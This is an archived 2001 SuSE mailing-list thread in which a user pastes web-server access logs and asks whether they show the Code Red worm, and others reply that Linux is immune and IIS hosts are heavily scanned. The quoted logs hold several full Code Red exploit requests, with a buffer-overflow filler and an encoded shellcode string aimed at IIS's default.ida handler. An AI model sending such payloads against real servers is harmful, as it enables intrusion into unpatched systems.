Mailinglist Archive: opensuse (4053 mails)

< Previous Next >
RE: [SLE] code red question....
  • From: "Brandon Caudle" <bcaudle@xxxxxxxxxxx>
  • Date: Tue, 07 Aug 2001 12:21:41 -0400
  • Message-id: <F220d28kIN4MmXKCnzN00000bc0@xxxxxxxxxxx>
True you can't be infected but you will be scanned. The other night I looked at the logs for all 4 of my dsls and they were scaned something like 2000 times apiece. This is the prime reason no one should use microsoft iis

Brandon Caudle
--------------
15yr Old Avid Unix User (HP-UX,FreeBSD,Linux)



From: Andy Calloway <andy.calloway@xxxxxxxxxxxxxx>
To: "'James.Hatridge@xxxxxxxx'" <James.Hatridge@xxxxxxxx>, suse-linux-e@xxxxxxxx
Subject: RE: [SLE] code red question....
Date: Tue, 7 Aug 2001 17:12:15 +0100

You can't be infected on Linux, it only affects IIS servers.

(Yippee!)

-----Original Message-----
From: Jim Hatridge [mailto:James.Hatridge@xxxxxxxx]
Sent: 07 August 2001 11:53
To: suse-linux-e@xxxxxxxx
Subject: [SLE] code red question....


Hi all..

After all this talk about code red, I looked at my access_log and found this

stuff. Is this the code red attack? If so, do I need to worry about it? I'm
running a "plain jane" install of SuSE 7.1 on my internet machine. I am on a

56k dialup and only on the net about 30 minutes per day. Also the first
line
(127.---) is that my localhost?


TIA


JIM

****************************************************************************
**

127.0.0.1 - - [09/Apr/2001:11:43:57 +0200] "GET /robots.txt HTTP/1.0" 200
231

194.158.105.5 - - [22/Apr/2001:16:14:55 +0200] "GET http://www.amd.com/
HTTP/1.0" 200 4676

24.139.0.245 - - [22/Jul/2001:12:40:53 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 319

212.84.163.91 - - [01/Aug/2001:21:18:55 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 319

202.105.119.98 - - [04/Aug/2001:14:59:04 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 319

213.168.222.197 - - [04/Aug/2001:19:54:47 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 272

211.222.31.2 - - [04/Aug/2001:20:10:21 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 319

*********************************************************************
--
Jim Hatridge

------------------------------------------------------
BayerWulf
The Recycled Beowulf Project
Looking for throw-away or obsolete computers and parts
to recycle into a Linux super computer


--
To unsubscribe send e-mail to suse-linux-e-unsubscribe@xxxxxxxx
For additional commands send e-mail to suse-linux-e-help@xxxxxxxx

Also check the FAQ at http://www.suse.com/support/faq and the
archives at http://lists.suse.com


**************************************************************************************************
The views expressed in this E-mail are those of the author and not necessarily those of Knowledge Management Software.
If you are not the intended recipient or the person responsible for delivering to the intended recipient, please be advised that you have received this E-mail in error and that any use is strictly prohibited.

If you have received this E-mail in error, please notify us by forwarding this E-mail to the following address:

mailadmin@xxxxxxxxxxxxxx
**************************************************************************************************

--
To unsubscribe send e-mail to suse-linux-e-unsubscribe@xxxxxxxx
For additional commands send e-mail to suse-linux-e-help@xxxxxxxx
Also check the FAQ at http://www.suse.com/support/faq and the
archives at http://lists.suse.com



_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp


< Previous Next >